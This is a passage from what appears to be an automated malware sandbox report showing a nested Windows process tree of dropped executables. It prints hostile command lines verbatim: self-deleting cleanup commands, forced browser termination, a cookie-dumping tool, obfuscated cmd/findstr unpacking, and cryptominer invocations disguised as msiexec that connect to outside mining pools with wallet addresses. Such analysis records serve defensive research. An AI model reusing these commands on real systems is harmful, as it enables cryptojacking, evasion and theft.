                                                                                                    • C:\ProgramData\1863490.exe
                                                                                                      "C:\ProgramData\1863490.exe"
                                                                                                      17⤵
                                                                                                        PID:9004
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ypkspoon.gwm\wwfvd.exe & exit
                                                                                                    15⤵
                                                                                                      PID:8916
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ypkspoon.gwm\wwfvd.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\ypkspoon.gwm\wwfvd.exe
                                                                                                        16⤵
                                                                                                        • Checks processor information in registry
                                                                                                        PID:8432
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\ypkspoon.gwm\wwfvd.exe" & del C:\ProgramData\*.dll & exit
                                                                                                          17⤵
                                                                                                            PID:8044
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /im wwfvd.exe /f
                                                                                                              18⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:8384
                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                              timeout /t 6
                                                                                                              18⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:5916
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\crok1iqn.hfd\askinstall31.exe & exit
                                                                                                        15⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:5220
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\crok1iqn.hfd\askinstall31.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\crok1iqn.hfd\askinstall31.exe
                                                                                                          16⤵
                                                                                                            PID:4276
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\00gs1a5q.k5q\toolspab1.exe & exit
                                                                                                          15⤵
                                                                                                            PID:8056
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\00gs1a5q.k5q\toolspab1.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\00gs1a5q.k5q\toolspab1.exe
                                                                                                              16⤵
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:8608
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\00gs1a5q.k5q\toolspab1.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\00gs1a5q.k5q\toolspab1.exe
                                                                                                                17⤵
                                                                                                                  PID:8840
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fw5bhecj.vd0\GcleanerWW.exe /mixone & exit
                                                                                                              15⤵
                                                                                                                PID:8984
                                                                                                      • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe
                                                                                                        "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                                        11⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:6356
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-GR2C8.tmp\lylal220.tmp
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-GR2C8.tmp\lylal220.tmp" /SL5="$503E4,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                                          12⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:6508
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-B7P35.tmp\ysAGEL.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-B7P35.tmp\ysAGEL.exe" /S /UID=lylal220
                                                                                                            13⤵
                                                                                                            • Drops file in Drivers directory
                                                                                                            • Executes dropped EXE
                                                                                                            • Adds Run key to start application
                                                                                                            PID:7036
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BPGLXZZASZ\irecord.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\BPGLXZZASZ\irecord.exe" /VERYSILENT
                                                                                                              14⤵
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5464
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-NL1GS.tmp\irecord.tmp
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-NL1GS.tmp\irecord.tmp" /SL5="$30540,5922518,66560,C:\Users\Admin\AppData\Local\Temp\BPGLXZZASZ\irecord.exe" /VERYSILENT
                                                                                                                15⤵
                                                                                                                • Drops file in Program Files directory
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:6644
                                                                                                                • C:\Program Files (x86)\i-record\i-record.exe
                                                                                                                  "C:\Program Files (x86)\i-record\i-record.exe" -silent -desktopShortcut -programMenu
                                                                                                                  16⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:4132
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\e6-b579c-2bc-e849f-797010e553320\Vofoxasyxa.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\e6-b579c-2bc-e849f-797010e553320\Vofoxasyxa.exe"
                                                                                                              14⤵
                                                                                                              • Checks computer location settings
                                                                                                              PID:6188
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\27-f1c16-147-497b5-097490ffe3d8a\Wovateculy.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\27-f1c16-147-497b5-097490ffe3d8a\Wovateculy.exe"
                                                                                                              14⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:6776
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fhcujymd.4qq\gaooo.exe & exit
                                                                                                                15⤵
                                                                                                                  PID:5764
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\fhcujymd.4qq\gaooo.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\fhcujymd.4qq\gaooo.exe
                                                                                                                    16⤵
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:7584
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      17⤵
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:7876
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      17⤵
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:7604
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t0hekvnx.qom\jg8_8qyu.exe & exit
                                                                                                                  15⤵
                                                                                                                    PID:9212
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\t0hekvnx.qom\jg8_8qyu.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\t0hekvnx.qom\jg8_8qyu.exe
                                                                                                                      16⤵
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:7188
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\00bbldlw.aq2\google-game.exe & exit
                                                                                                                    15⤵
                                                                                                                      PID:5072
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\00bbldlw.aq2\google-game.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\00bbldlw.aq2\google-game.exe
                                                                                                                        16⤵
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:7760
                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                          17⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:8488
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gles5qr3.dtt\BarSetpFile.exe /silent & exit
                                                                                                                      15⤵
                                                                                                                        PID:8144
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\gles5qr3.dtt\BarSetpFile.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\gles5qr3.dtt\BarSetpFile.exe /silent
                                                                                                                          16⤵
                                                                                                                            PID:9076
                                                                                                                            • C:\ProgramData\5923281.exe
                                                                                                                              "C:\ProgramData\5923281.exe"
                                                                                                                              17⤵
                                                                                                                                PID:5728
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xn1cu1lg.nt0\wwfvd.exe & exit
                                                                                                                            15⤵
                                                                                                                              PID:8500
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\xn1cu1lg.nt0\wwfvd.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\xn1cu1lg.nt0\wwfvd.exe
                                                                                                                                16⤵
                                                                                                                                • Checks processor information in registry
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:8724
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\xn1cu1lg.nt0\wwfvd.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                  17⤵
                                                                                                                                    PID:6728
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      taskkill /im wwfvd.exe /f
                                                                                                                                      18⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:7844
                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                      timeout /t 6
                                                                                                                                      18⤵
                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                      PID:4720
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3mojt0ua.f33\askinstall31.exe & exit
                                                                                                                                15⤵
                                                                                                                                  PID:7500
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3mojt0ua.f33\askinstall31.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\3mojt0ua.f33\askinstall31.exe
                                                                                                                                    16⤵
                                                                                                                                      PID:2940
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                        17⤵
                                                                                                                                          PID:3476
                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                            18⤵
                                                                                                                                            • Kills process with taskkill
                                                                                                                                            PID:7208
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rlrv0r3k.qxu\toolspab1.exe & exit
                                                                                                                                      15⤵
                                                                                                                                        PID:6260
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\rlrv0r3k.qxu\toolspab1.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\rlrv0r3k.qxu\toolspab1.exe
                                                                                                                                          16⤵
                                                                                                                                            PID:5376
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\rlrv0r3k.qxu\toolspab1.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\rlrv0r3k.qxu\toolspab1.exe
                                                                                                                                              17⤵
                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                              PID:5460
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qma2nnuc.ljz\GcleanerWW.exe /mixone & exit
                                                                                                                                          15⤵
                                                                                                                                            PID:8616
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j3fvblqe.ovs\setup_10.2_mix.exe & exit
                                                                                                                                            15⤵
                                                                                                                                              PID:7616
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\j3fvblqe.ovs\setup_10.2_mix.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\j3fvblqe.ovs\setup_10.2_mix.exe
                                                                                                                                                16⤵
                                                                                                                                                  PID:5292
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ssyiw1kw.v0b\file_1.exe & exit
                                                                                                                                                15⤵
                                                                                                                                                  PID:4420
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ssyiw1kw.v0b\file_1.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\ssyiw1kw.v0b\file_1.exe
                                                                                                                                                    16⤵
                                                                                                                                                      PID:5020
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
                                                                                                                                                        17⤵
                                                                                                                                                          PID:6432
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\9C8M1JHDBV\multitimer.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\9C8M1JHDBV\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                                                                                                                                            18⤵
                                                                                                                                                              PID:4460
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\9C8M1JHDBV\multitimer.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\9C8M1JHDBV\multitimer.exe" 1 3.1618089031.607214473aaeb 101
                                                                                                                                                                19⤵
                                                                                                                                                                  PID:5372
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9C8M1JHDBV\multitimer.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\9C8M1JHDBV\multitimer.exe" 2 3.1618089031.607214473aaeb
                                                                                                                                                                    20⤵
                                                                                                                                                                      PID:7732
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\03rq4dfwq5h\eisvuksvrhe.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\03rq4dfwq5h\eisvuksvrhe.exe" /ustwo INSTALL
                                                                                                                                                                        21⤵
                                                                                                                                                                          PID:7444
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7444 -s 652
                                                                                                                                                                            22⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:5948
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7444 -s 668
                                                                                                                                                                            22⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:4464
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7444 -s 768
                                                                                                                                                                            22⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:6648
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7444 -s 804
                                                                                                                                                                            22⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:6812
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7444 -s 884
                                                                                                                                                                            22⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:384
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7444 -s 932
                                                                                                                                                                            22⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:7908
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7444 -s 1096
                                                                                                                                                                            22⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:8504
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\gz1exuoj4ao\Setup3310.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\gz1exuoj4ao\Setup3310.exe" /Verysilent /subid=577
                                                                                                                                                                          21⤵
                                                                                                                                                                            PID:8224
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-BMI7I.tmp\Setup3310.tmp
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-BMI7I.tmp\Setup3310.tmp" /SL5="$70420,138429,56832,C:\Users\Admin\AppData\Local\Temp\gz1exuoj4ao\Setup3310.exe" /Verysilent /subid=577
                                                                                                                                                                              22⤵
                                                                                                                                                                                PID:6124
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-AQ9FE.tmp\Setup.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-AQ9FE.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                  23⤵
                                                                                                                                                                                    PID:7872
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\xx5ecz5wjaf\app.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\xx5ecz5wjaf\app.exe" /8-23
                                                                                                                                                                                21⤵
                                                                                                                                                                                  PID:4604
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\xx5ecz5wjaf\app.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\xx5ecz5wjaf\app.exe" /8-23
                                                                                                                                                                                    22⤵
                                                                                                                                                                                      PID:6580
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 628
                                                                                                                                                                                      22⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:6456
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\AY2QSEMNCT\setups.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\AY2QSEMNCT\setups.exe" ll
                                                                                                                                                                              18⤵
                                                                                                                                                                                PID:4688
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-JJLV5.tmp\setups.tmp
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-JJLV5.tmp\setups.tmp" /SL5="$70598,2051888,270336,C:\Users\Admin\AppData\Local\Temp\AY2QSEMNCT\setups.exe" ll
                                                                                                                                                                                  19⤵
                                                                                                                                                                                    PID:7596
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX3\Free.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Free.exe"
                                                                                                                                                                                17⤵
                                                                                                                                                                                  PID:4840
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                                    18⤵
                                                                                                                                                                                      PID:6684
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
                                                                                                                                                                                    17⤵
                                                                                                                                                                                      PID:4808
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5EDB.tmp.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5EDB.tmp.exe"
                                                                                                                                                                                        18⤵
                                                                                                                                                                                          PID:5736
                                                                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w27583 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                                            19⤵
                                                                                                                                                                                              PID:2892
                                                                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                              -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w7757@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                                              19⤵
                                                                                                                                                                                                PID:4472
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
                                                                                                                                                                                              18⤵
                                                                                                                                                                                                PID:8152
                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                  ping 127.0.0.1
                                                                                                                                                                                                  19⤵
                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                  PID:8156
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"
                                                                                                                                                                                              17⤵
                                                                                                                                                                                                PID:8132
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h0wxpqjv.tl3\6762a766.exe & exit
                                                                                                                                                                                            15⤵
                                                                                                                                                                                              PID:2208
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\h0wxpqjv.tl3\6762a766.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\h0wxpqjv.tl3\6762a766.exe
                                                                                                                                                                                                16⤵
                                                                                                                                                                                                  PID:6452
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y55hhmuw.jvs\app.exe /8-2222 & exit
                                                                                                                                                                                                15⤵
                                                                                                                                                                                                  PID:5180
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\y55hhmuw.jvs\app.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\y55hhmuw.jvs\app.exe /8-2222
                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                      PID:8128
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\y55hhmuw.jvs\app.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\y55hhmuw.jvs\app.exe" /8-2222
                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                          PID:3840
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 8128 -s 764
                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:4244
                                                                                                                                                                                            • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe
                                                                                                                                                                                              "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"
                                                                                                                                                                                              11⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                              PID:6236
                                                                                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                                                                                                                                                                                                12⤵
                                                                                                                                                                                                  PID:6620
                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    PID:7008
                                                                                                                                                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe
                                                                                                                                                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe"
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                PID:6392
                                                                                                                                                                                                • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                                                  "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                    PID:5752
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Congiunte.vstx
                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                      PID:5696
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                          PID:5804
                                                                                                                                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                            findstr /V /R "^vwjMyTzhxjHATonkmcjOlJMtCRUiLDSlcOLAlCdfhnxfouvyjMTUesyNfophYkCRzbtybXwXyWALgvWvcPVYKYirIYkwzrswWDWKw$" Tue.vstx
                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                              PID:7896
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com
                                                                                                                                                                                                              Infinita.exe.com x
                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                PID:6892
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com x
                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                    PID:7084
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe
                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                        PID:1560
                                                                                                                                                                                                                        • C:\Users\Admin\Videos\xmrmin.exe
                                                                                                                                                                                                                          "C:\Users\Admin\Videos\xmrmin.exe"
                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                            PID:8356
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                              18⤵
                                                                                                                                                                                                                                PID:6236
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\PULServices.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\PULServices.exe"
                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                  PID:8388
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                    19⤵
                                                                                                                                                                                                                                      PID:5516
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\PULServices.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\PULServices.exe"
                                                                                                                                                                                                                                        20⤵
                                                                                                                                                                                                                                          PID:5288
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                            21⤵
                                                                                                                                                                                                                                              PID:6948
                                                                                                                                                                                                                                    • C:\Users\Admin\Videos\ethminer.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\Videos\ethminer.exe"
                                                                                                                                                                                                                                      17⤵
                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                      PID:5376
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                                                                                        18⤵
                                                                                                                                                                                                                                          PID:4972
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\WUFServices.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"
